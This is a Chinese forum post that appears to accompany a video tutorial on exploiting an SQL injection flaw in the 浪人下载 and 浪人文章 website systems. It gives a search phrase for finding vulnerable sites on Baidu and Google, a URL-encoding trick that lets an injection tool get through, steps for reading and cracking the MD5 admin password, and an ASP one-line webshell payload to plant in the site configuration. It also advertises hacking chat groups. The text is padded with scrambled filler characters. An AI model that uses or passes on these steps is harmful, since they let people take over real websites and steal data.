软件简介:
* U% ~2 w8 ^! ]今天做的动画是浪人下载和浪人文章的0DAY漏洞利用1 i( d; L" H/ g; ]
其实也不是什么0DAY啦,就是一个注入漏洞! \' K7 E' }3 p! r4 s
浪人:www.lre.cn7 L- t. O/ m+ N4 i4 u3 S# I- ]
大家可以快进看
6 V" a o0 a- N1 p% |先随便点一个软件下载: G5 v2 }) y* t% d" e5 ]- Y. |
官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦
3 g' o0 K2 [! {, T把下载地址复制到明小子里面,把I改成%69
5 ~- I& T# S/ n9 z: J q8 c, }看到了吗,没有改之前是不能注入额
* w) T! q+ G7 _1 m% ?9 r+ {$ A恭喜,该URL可以注入!
6 ?; T! S+ N) Q( C9 w数据库类型:Access数据库
$ o9 }6 L/ s8 `2 Y, i下面来讲讲关键字的搜索
3 o# a7 r b0 F, H, c3 o下载链接若长时间无响应,请稍候再试;无法下载或是其它问题,请给我留言.....就是这一句了: M) j0 e" P0 K3 |3 M
在BAIDU上搜搜看
) t) V$ Q: O' I9 O4 X5 z" @* s百度一下,找到相关网页约6,030篇
8 c" }/ r" p" u4 s, v, y再看看GOOGLE z* h$ d" e1 D( u& F7 ]
网页 约有12,800项符合
) S f+ S! r8 F: D1 C( m看到了吧: S) G, u& B. Z8 H. W
下面正式进入正题,我就不打字了
- `0 F( F% i# K/ l大家仔细看; b% ~; Z3 d o6 }& G7 u0 ^
我在本机上测试的
. Z0 E9 j* O( hAdmin_Info7 h# j0 S f0 L
是管理员表
) Q* M4 x8 K9 {( q# t! i密码是MD5加密的,在WWW.CMD5.COM上可以解密
& p' `. V+ V Q郁闷。。。。不知道为什么本机老跑不出来 r0 b3 i+ Z) h9 D
反正我知道密码啦,下面开始拿webshell9 W9 i& c3 O4 o( J. ^' H
如果你们猜的话一定可以猜出来的
( F# D: g6 p. z( y本机猜出来了 q" V& @- A0 ~. E( i
有些后台是ADMIN.ASP3 f/ L; Y$ c! o" |9 m4 n
还有的是LOGIN.ASP7 V# m- p* _& K; d: f# `$ M
版本不同啦) n" ~3 l, h; W% x$ O; S: S
后台有两种方法拿WEBSHELL) m. l' [) C8 `( V3 d- h
看我演示3 L; k. Q' L( u! B% K [2 l
OK,这是第一种* t4 \8 P! ?, H
下面讲第二种4 H1 d0 v* Y+ W
在网站配置信息里
, ~( s S3 p5 b/ h9 K4 T! ~ }: U插入一句话
/ {/ K) J+ J2 U2 @不是光查2 ^( f* K6 K3 O+ G0 V, G
%eval request(#)%
9 i1 ^9 Y* @1 z, f8 }1 L2 |这样是不行的# G. N. d5 T% ] n; u* j
看演示* `3 ~9 C7 B. r1 `: U! r0 t
sss%%eval request(#)%%ViewMessage=c
( {5 E. t" V+ I' e* I下载说明里面写上上面的一句话
" f& U" K( T2 S; W2 R( e% p我都已经写好了
" W: t% w! h5 v' u. Y1 p7 M) shttp://localhost/down/Inc\Config.asp1 J1 L9 ]& g/ ^. d3 S/ O- h+ |( V
这个是我一句话的地址: {5 Q. V; `/ r
然后连接就可以了% T8 o; D4 [1 u5 \
885 k) f" J, j3 ]
邪恶领域[一]群" J' q) w* b5 F: S1 n9 B3 H
群号:84948756 W! Q; i8 t' ]5 b1 ~
邪恶领域[二]群
* x) t( C9 V& p; R群号:5501649 : |! I* Q/ \% G- O' m2 W
补充一下0 b7 {$ V1 X7 a1 Z% J3 b8 C B' M# a
浪人文章也有一样的漏洞. Q3 g3 P& @' I8 |4 |) a
88+ B$ v- C; w, |. i3 t2 ^$ P
下载地址:
|